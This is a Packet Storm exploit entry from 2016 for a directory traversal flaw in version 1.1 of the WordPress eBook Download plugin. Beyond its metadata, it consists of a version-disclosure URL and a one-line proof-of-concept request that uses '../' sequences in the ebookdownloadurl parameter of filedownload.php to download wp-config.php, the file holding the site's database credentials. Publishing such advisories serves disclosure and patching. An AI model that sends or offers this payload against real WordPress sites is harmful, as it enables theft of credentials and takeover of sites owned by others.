WordPress eBook Download 1.1 Directory Traversal

2016-03-21T00:00:00
ID PACKETSTORM:136321
Type packetstorm
Reporter Wadeek
Modified 2016-03-21T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal  
# Exploit Author: Wadeek  
# Website Author: https://github.com/Wad-Deek  
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip  
# Version: 1.1  
# Tested on: Xampp on Windows7  
  
[Version Disclosure]  
======================================  
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt  
======================================  
  
[PoC]  
======================================  
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php  
======================================  
  
`